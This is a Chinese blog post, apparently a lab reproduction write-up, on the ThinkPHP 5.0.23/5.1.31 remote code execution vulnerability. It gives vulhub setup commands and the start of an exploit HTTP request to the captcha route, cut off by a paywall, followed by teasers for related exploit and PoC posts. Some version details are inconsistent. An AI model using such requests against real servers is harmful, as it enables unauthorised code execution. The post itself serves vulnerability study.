ThinkPHP 5.0.23/5.1.31 远程代码执行(含批量验证poc)

已于 2024-04-03 14:51:39 修改
阅读量243 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-03 14:51:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137345743
版权
ThinkPHP 5.0.23和5.1.31因未正确处理控制器名,存在远程命令执行风险。在未启用强制路由时,攻击者可执行任意方法。漏洞可通过特定payload验证,官方已发布新版本5.0.23和5.1.31进行修复,建议受影响用户升级。
摘要由CSDN通过智能技术生成

漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其版本5.0.23和5.1.331中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

影响版本

5.0.23/5.1.31

环境部署

该环境可以使用vulhub进行部署

cd vulhub/thinkphp
docker-compose up -d
docker-compose ps

image.png

漏洞利用

paylaod:

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Conn
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5388
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
[EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
weixin_30314793的博客
03-14 511
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution # Date: 2018-12-11 # Exploit Author: VulnSpy # Vendor Homepage: https://thinkphp.cn # Software Link: https://github.com/t...
thinkphp远程代码执行exp
07-29
thinkphp远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
ThinkPHP远程代码执行漏洞分析及防御指南
最新发布
gitblog_00643的博客
08-15 960
ThinkPHP远程代码执行漏洞分析及防御指南 ThinkphpRCE项目地址:https://gitcode.com/gh_mirrors/th/ThinkphpRCE 一、项目介绍 1.1 概述 ThinkPHP是一款流行的PHP开发框架,以其简洁高效的特性深受开发者喜爱。然而,在一些版本中发现的安全漏洞威胁到了基于该框架构建的Web应用程序的安全性。其中,“thinkphp-RCE-POC...
thinkphp框架远程代码执行
m0_68976043的博客
07-29 493
一定添加--privileged不然只能拉取环境首页不显示。二、thinkphp远程代码执行。vulfocus网上自行下载。
ThinkPHP5 远程代码执行
LYJ20010728的博客
08-16 2460
这里写目录标题漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致远程代码执行漏洞的产生 漏洞影响版本: 5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 初始配置 获取测试环境代码 composer create-project --prefer-dist topthink
ThinkPHP5.0.x 远程代码执行
LYJ20010728的博客
08-16 1168
ThinkPHP5.0.x 远程代码执行漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 的缓存类中。该类会将缓存数据通过序列化的方式,直接存储在 .php 文件中,攻击者通过精心构造的 payload ,即可将 webshell 写入缓存文件。缓存文件的名字和目录均可预测出来,一旦缓存目录可访问或结合任意文件包漏洞,即可触发 远程代码执行漏洞 漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.10 初始配置 获取测试环境代码
Thinkphp5.0.23 rce(远程代码执行
Lucky1youzi的博客
01-20 900
Thinkphp5.0.23 rce(远程代码执行
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2246
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)
墨痕诉清风的博客
11-07 4497
官方公告:1、2、POC批量检测单个检测。
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
记录一次vulhub:ThinkPHP5 5.0.23远程代码执行漏洞复现
sszsNo1的博客
06-26 323
复现vulhub:ThinkPHP5 5.0.23远程代码执行漏洞
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 858
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
thinkphp5+远程代码执行_ThinkPHP5 远程代码执行漏洞高危
weixin_39889642的博客
11-25 110
安全预警漏洞ThinkPHP5远程代码执行漏洞等级:高危影响范围:thinkphp 5.x漏洞描述:框架中的Request类的存在设计缺陷导致远程代码执行漏洞,最终攻击者可利用该漏洞获取系统权限。修复方案:https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de0032019...
thinkphp5+远程代码执行_ThinkPHP5.0.*远程代码执行漏洞预警
weixin_39861255的博客
11-25 120
安全公告Thinkphp5.0.*存在远程代码执行漏洞漏洞描述Thinkphp5.0.*存在远程代码执行漏洞。攻击者可以利用漏洞实现任意代码执行等高危操作。目前官方已经出了补丁(https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003),漏洞出现在处理请求的类中。攻击者可以控制类的...
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1742
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。
「网络安全预警通报」关于ThinkPHP存在远程命令执行漏洞的预警通报
weixin_44052945的博客
12-13 254
北京网络与信息安全信息通报中心通报,近日,ThinkPHP官方(ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架)发布安全更新,用于修复一个严重的远程代码执行漏洞。此次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下引发黑客执行远程恶意代码,从而获取权限。 一、 基本情况 远程代码执行漏洞是用户通过浏览器提交执行命令,由于服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值